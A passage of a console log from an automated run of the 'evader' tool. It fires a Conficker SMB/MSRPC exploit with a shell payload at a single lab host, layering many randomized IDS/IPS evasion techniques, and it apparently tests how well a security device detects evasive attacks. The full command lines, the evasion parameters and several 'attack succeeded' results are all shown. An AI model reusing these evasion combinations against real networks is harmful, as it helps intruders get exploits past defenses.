- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.114:45463 -> 10.35.1.207:445
- Terminated
- .........
- 9544 runs averaging 1.89 runs / second ; progress: 5043/43200..........
- 9554 runs averaging 1.89 runs / second ; progress: 5048/43200......
- 9560 runs averaging 1.89 runs / second ; progress: 5053/43200
- 9560 runs averaging 1.89 runs / second ; progress: 5058/43200...
- 9563 runs averaging 1.89 runs / second ; progress: 5063/43200.......
- 9570 runs averaging 1.89 runs / second ; progress: 5068/43200........
- 9578 runs averaging 1.89 runs / second ; progress: 5073/43200...
- 9581 runs averaging 1.89 runs / second ; progress: 5078/43200....
- 9585 runs averaging 1.89 runs / second ; progress: 5083/43200..........
- 9595 runs averaging 1.89 runs / second ; progress: 5088/43200...2015-06-08 00:44:19 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51195 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=WX0LabE5SUM --evasion=[smb_connect,msrpc_bind]netbios_chaff,"21","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed WX0LabE5SUN
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.113:51195 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 9607 runs averaging 1.89 runs / second ; progress: 5093/43200.Pid 14503 timed out - killed
- 2015-06-08 00:44:24 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=crQp6CU8s8g --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"64" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed crQp6CU8s8h
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.110:24836 -> 10.35.1.207:445
- Terminated
- .....
- 9614 runs averaging 1.89 runs / second ; progress: 5098/43200......
- 9620 runs averaging 1.89 runs / second ; progress: 5103/43200.........
- 9629 runs averaging 1.89 runs / second ; progress: 5108/43200..........
- 9639 runs averaging 1.89 runs / second ; progress: 5113/43200.........
- 9648 runs averaging 1.89 runs / second ; progress: 5118/43200.......
- 9655 runs averaging 1.88 runs / second ; progress: 5123/43200.....
- 9660 runs averaging 1.88 runs / second ; progress: 5128/43200.........
- 9669 runs averaging 1.88 runs / second ; progress: 5133/43200.....
- 9674 runs averaging 1.88 runs / second ; progress: 5138/43200.....
- 9679 runs averaging 1.88 runs / second ; progress: 5143/43200...........
- 9690 runs averaging 1.88 runs / second ; progress: 5148/43200...........
- 9701 runs averaging 1.88 runs / second ; progress: 5153/43200...2015-06-08 00:45:25 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35341 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=ggSUJv4b+PQ --evasion=[smb_openpipe,end]smb_writeandxpad,"6","random" --evasion=[start,end]tcp_paws,"50%","187349922","random" --verifydelay=1000 --payload=shell
- Info: Using random seed ggSUJv4b+PS
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 187349922> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- Info: NetBIOS connection 10.62.90.114:35341 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:45:25 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58158 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xTjXRzVMytY --evasion=[smb_opentree,end]tcp_paws,"5","9","shuffle" --evasion=[smb_openpipe,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed xTjXRzVMytb
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.110:58158 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 9710 runs averaging 1.88 runs / second ; progress: 5158/43200......
- 9716 runs averaging 1.88 runs / second ; progress: 5163/43200.....
- 9721 runs averaging 1.88 runs / second ; progress: 5168/43200..
- 9723 runs averaging 1.88 runs / second ; progress: 5173/43200Pid 15235 timed out - killed
- 2015-06-08 00:45:43 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62990 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F8rOXONBWIg --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"3","5","90","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed F8rOXONBWIg
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 90 random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:62990 -> 10.35.1.207:445
- Terminated
- ............
- 9736 runs averaging 1.88 runs / second ; progress: 5178/43200......
- 9742 runs averaging 1.88 runs / second ; progress: 5183/43200
- 9742 runs averaging 1.88 runs / second ; progress: 5188/43200
- 9742 runs averaging 1.88 runs / second ; progress: 5193/43200....
- 9746 runs averaging 1.87 runs / second ; progress: 5198/43200..
- 9748 runs averaging 1.87 runs / second ; progress: 5203/43200
- 9748 runs averaging 1.87 runs / second ; progress: 5208/43200..
- 9750 runs averaging 1.87 runs / second ; progress: 5213/43200.....
- 9755 runs averaging 1.87 runs / second ; progress: 5218/43200.....
- 9760 runs averaging 1.87 runs / second ; progress: 5223/43200......
- 9766 runs averaging 1.87 runs / second ; progress: 5228/43200Pid 16139 timed out - killed
- 2015-06-08 00:46:38 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18534 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=UWQTgxLgPHQ --evasion=[start,end]tcp_chaff,"13","nullchksum|outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed UWQTgxLgPHR
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:18534 -> 10.35.1.207:445
- Terminated
- .2015-06-08 00:46:39 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61513 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=5kiMdDy3TFI --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"2","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","5","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 5kiMdDy3TFL
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:61513 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 9784 runs averaging 1.87 runs / second ; progress: 5233/43200..............
- 9798 runs averaging 1.87 runs / second ; progress: 5238/43200...........2015-06-08 00:46:52 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11372 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lnUUcWzYjN4 --evasion=[start,msrpc_req]tcp_chaff,"25%","nullchksum|nullflag","random_alpha" --evasion=[start,msrpc_req]tcp_paws,"75%","144672393","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed lnUUcWzYjN6
- The following evasions are applied from stage start to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * Duplicate packet has random alpha bytes as payload
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 144672393> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.111:11372 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 9811 runs averaging 1.87 runs / second ; progress: 5243/43200............
- 9823 runs averaging 1.87 runs / second ; progress: 5248/43200.......
- 9830 runs averaging 1.87 runs / second ; progress: 5253/43200.....
- 9835 runs averaging 1.87 runs / second ; progress: 5258/43200..Pid 16829 timed out - killed
- 2015-06-08 00:47:11 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31195 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=g3i822C4j6o --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","7","1","random_msrpcbind" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"50%","longhdr","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed g3i822C4j6q
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:31195 -> 10.35.1.207:445
- Terminated
- ......
- 9844 runs averaging 1.87 runs / second ; progress: 5263/43200.
- 9845 runs averaging 1.87 runs / second ; progress: 5268/43200
- 9845 runs averaging 1.87 runs / second ; progress: 5273/43200....
- 9849 runs averaging 1.87 runs / second ; progress: 5278/43200..........
- 9859 runs averaging 1.87 runs / second ; progress: 5283/43200.2015-06-08 00:47:34 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49009 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=pAFHX3UuQoc --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_ebcdic","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,end]tcp_paws,"1","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed pAFHX3UuQoe
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * Cray floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.118:49009 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..Pid 17242 timed out - killed
- 2015-06-08 00:47:36 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37714 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zMj0U5a/Pp0 --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"50%","random_alphanum" --evasion=[smb_opentree,end]tcp_urgent,"13","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed zMj0U5a/Pp3
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.112:37714 -> 10.35.1.207:445
- Terminated
- .....
- 9869 runs averaging 1.87 runs / second ; progress: 5288/43200........
- 9877 runs averaging 1.87 runs / second ; progress: 5293/43200.
- 9878 runs averaging 1.86 runs / second ; progress: 5298/43200
- 9878 runs averaging 1.86 runs / second ; progress: 5303/43200Pid 17425 timed out - killed
- 2015-06-08 00:47:55 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46226 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=phYQAl9P9Ek --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"5","empty_unspec|empty_keepalive|http_post|msrpc_req" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed phYQAl9P9Em
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.115:46226 -> 10.35.1.207:445
- Terminated
- ...........
- 9890 runs averaging 1.86 runs / second ; progress: 5308/43200...........
- 9901 runs averaging 1.86 runs / second ; progress: 5314/43200..2015-06-08 00:48:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51959 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=+VYvQ2mQ8bE --evasion=[smb_connect,end]smb_chaff,"5","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"1022","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed +VYvQ2mQ8bH
- The following evasions are applied from stage smb_connect to end:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:51959 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9907 runs averaging 1.86 runs / second ; progress: 5319/43200.......
- 9914 runs averaging 1.86 runs / second ; progress: 5324/43200..............
- 9928 runs averaging 1.86 runs / second ; progress: 5329/43200.............
- 9941 runs averaging 1.86 runs / second ; progress: 5334/43200....
- 9945 runs averaging 1.86 runs / second ; progress: 5339/43200.Pid 17947 timed out - killed
- 2015-06-08 00:48:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19121 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=DkgYBia6gZ4 --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","2","10","random" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"5","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed DkgYBia6gZ4
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 10 random bytes.
- Info: NetBIOS connection 10.62.90.116:19121 -> 10.35.1.207:445
- Terminated
- ........
- 9955 runs averaging 1.86 runs / second ; progress: 5344/43200.....2015-06-08 00:48:36 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37931 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=gb7yxSxJuLs --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","240184953","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed gb7yxSxJuLu
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240184953> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:37931 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 9967 runs averaging 1.86 runs / second ; progress: 5349/43200.....2015-06-08 00:48:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57198 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=gDU7yuN81Mg --evasion=[netbios_connect,smb_opentree]ipv4_opt,"2","inc","alphanumrandomized" --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_null_trailer" --evasion=[start,msrpc_req]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed gDU7yuN81Mi
- The following evasions are applied from stage start to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.115:57198 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..2015-06-08 00:48:41 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57307 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=qWTEmsEyMHI --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","zero" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","7","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed qWTEmsEyMHK
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.111:57307 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 9985 runs averaging 1.87 runs / second ; progress: 5354/43200..........2015-06-08 00:48:46 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hCXgqyW1xgM --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"6","random_alphanum" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"75%","6247869","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed hCXgqyW1xgO
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6247869> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:30391 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 10001 runs averaging 1.87 runs / second ; progress: 5359/43200.....2015-06-08 00:48:50 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39260 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=aglHj0x7Asw --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"25%","chksum|nullchksum|nullflag|outofwindow|shorthdr","unmodified" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed aglHj0x7Asx
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.111:39260 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .2015-06-08 00:48:51 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54804 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hoHhi2FG8pI --evasion=[smb_connect,smb_openpipe]tcp_chaff,"3","chksum","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","7","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed hoHhi2FG8pK
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * Duplicate packet has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.116:54804 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 10017 runs averaging 1.87 runs / second ; progress: 5364/43200.............
- 10030 runs averaging 1.87 runs / second ; progress: 5369/43200..........
- 10040 runs averaging 1.87 runs / second ; progress: 5374/43200.....
- 10045 runs averaging 1.87 runs / second ; progress: 5379/43200....
- 10049 runs averaging 1.87 runs / second ; progress: 5384/43200.....
- 10054 runs averaging 1.87 runs / second ; progress: 5389/43200..........Pid 18512 timed out - killed
- 2015-06-08 00:49:22 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29691 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UepWOS12Ry4 --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","unmodified" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed UepWOS12Ry5
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- Info: NetBIOS connection 10.62.90.113:29691 -> 10.35.1.207:445
- Terminated
- .....
- 10070 runs averaging 1.87 runs / second ; progress: 5394/43200..............2015-06-08 00:49:27 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23791 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=vvbQ2wZqrA4 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"7","4","7","random" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","7","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed vvbQ2wZqrA6
- The following evasions are applied from stage smb_opentree to msrpc_bind:
